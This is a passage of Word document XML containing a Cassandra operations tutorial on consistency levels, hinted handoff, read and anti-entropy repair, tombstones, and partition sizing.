    <w:p w14:paraId="25E154EB" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    ONE:        Fastest write, fastest read, most stale</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50837AD6" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    TWO:        Faster than QUORUM, less stale than ONE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0C37CF" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    QUORUM:     Strong consistency, moderate latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C5F8C2" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    LOCAL_QUORUM: Quorum within the local datacenter only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE50E48" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">                  Avoids cross-datacenter latency for strong consistency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0161B7E7" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    EACH_QUORUM: Quorum in EACH datacenter (strongest multi-DC guarantee)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD8C0EF" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    ALL:        All nodes must respond — no fault tolerance during write</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426E4427" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    ANY:        At least one node (can be a coordinator storing as a hint)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B395B68" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">                Even if all replicas are down — write succeeds (eventual delivery)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02746EAA" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="47C626FB" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Hinted handoff:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D24002" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  If replica is temporarily down during write:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EE4884" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Coordinator stores a "hint" (the write data) locally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B60EE36" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    When replica recovers: coordinator delivers the hint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209F43A5" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Replica applies the write → catches up without full repair</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F2C2FF" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342F7100" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Hint expiry (hinted_handoff_throttle_in_kb, max_hint_window_in_ms):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0EE7F7" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Hints expire after max_hint_window (default 3 hours)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E5B5D7" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    If replica down longer than 3 hours: must run repair to reconcile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787DBB0A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7D68D8" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Read repair:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082BE3D7" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  On read: coordinator reads from R nodes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D05985" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  If any node returns stale data (compared to other responses):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5206EF73" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Coordinator sends the latest value to stale nodes (read repair)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1CE817" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Stale nodes update themselves</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4300A7FA" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B38F1C6" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  read_repair_chance: probability of performing background read repair</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229FE524" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Default: 0.1 (10% chance on each read — background, not on critical path)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B264FFF" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Foreground read repair: always performed when inconsistency detected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D7D323" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCBB5F6" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Anti-entropy repair (nodetool repair):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B108CD0" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Periodic (recommended weekly): compare all data across all replicas using Merkle trees</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F6D784" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Merkle tree comparison: identify which partitions differ between nodes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB68F2A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Reconcile differences: stream missing data to nodes that are behind</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529EF82D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A3BFD9" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Critical for: data that was never read (never triggers read repair)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2003B815" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Without regular repair: nodes diverge over time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B9C5B6" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cassandra Operations — Production Considerations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E2A6EA" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702A4A01" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Node addition (scaling out):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2165F0E4" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  New node joins cluster:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED71D4A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    1. Announces presence to seed nodes via gossip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8B7E24" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    2. Assigned a token range (or multiple vnodes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B73183F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    3. Streams data from existing nodes for its assigned ranges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39761BC1" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    4. After streaming: starts accepting reads and writes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03138020" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E270A44" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Linear scalability: doubling nodes → approximately doubling throughput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC1A6D9" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  (because each node owns 1/2N of the data instead of 1/N)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522AC300" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D87AD9E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Streaming during bootstrap: heavy I/O on source nodes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691C5F56" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Schedule during low-traffic windows or throttle (nodetool setstreamthroughput)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00825763" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="235F2F15" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Tombstones — the silent performance killer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159E025D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  DELETE in Cassandra writes a tombstone (deletion marker), not an actual deletion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CD5E92" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Why: distributed system can't coordinate instant deletion across all replicas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B1F2C1" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Tombstones collected by compaction (once older than gc_grace_seconds, default 10 days)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BA7A87" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FB7185" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Problem: reads must process tombstones to determine if data is deleted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703EEB7B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    Accumulation: 1000 deletes → 1000 tombstones on every read until compaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DCCAAA" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Tombstone warning threshold: 1000 tombstones per read → slow reads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0957B4B4" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Tombstone failure threshold: 100,000 tombstones → read fails with TombstoneOverwhelmingException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BC01CF" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9E2051" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Common cause: time-series anti-pattern in Cassandra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4A8D28" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Storing telemetry with no TTL, then deleting old rows individually</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1316072F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    → Tombstone accumulation on large partitions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1E4CC5" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58741255" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Solutions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F02EE0" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    TTL (time to live): data expires automatically, tombstone eventually collected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54434C12" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">      INSERT INTO metrics (...) VALUES (...) USING TTL 86400;  -- expires in 24h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CA42C1" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Use TWCS for time-series: entire SSTables dropped (no tombstones)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6FB563" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Avoid deletes in hot paths: design data model to not require deletes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8E778C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="2A8D14DF" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Large partitions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01666EC8" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Partition containing too many rows → performance degrades</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B491DF" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Rule of thumb: &lt; 100MB per partition, &lt; 100K rows per partition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174D0017" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00093CC3" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Large partition symptoms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6CC679" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Slow reads (must scan through many rows)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510714A8" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    OOM during compaction (must deserialize entire partition into memory for merge)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B04C85" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    GC pressure from large partition objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61745BD6" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F4128F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Example anti-pattern:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7978CE6A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Partition key: (sensor_id)  -- if one sensor writes 1M readings/day: large partition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A93A9E0" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE8C978" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Fix: add time bucket to partition key:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6685EB4A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Partition key: (sensor_id, date_bucket)  -- one partition per sensor per day</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA068E6" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Maximum partition size: readings_per_day × row_size (bounded)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E5126D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D00B565" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Query impact: query spanning multiple days requires multiple partition reads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3B9657" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    But: queries bounded by time range → known number of partition reads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C037FB7" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Acceptable trade-off vs unbounded partition growth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D476FEB" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:pict w14:anchorId="75BC2120">
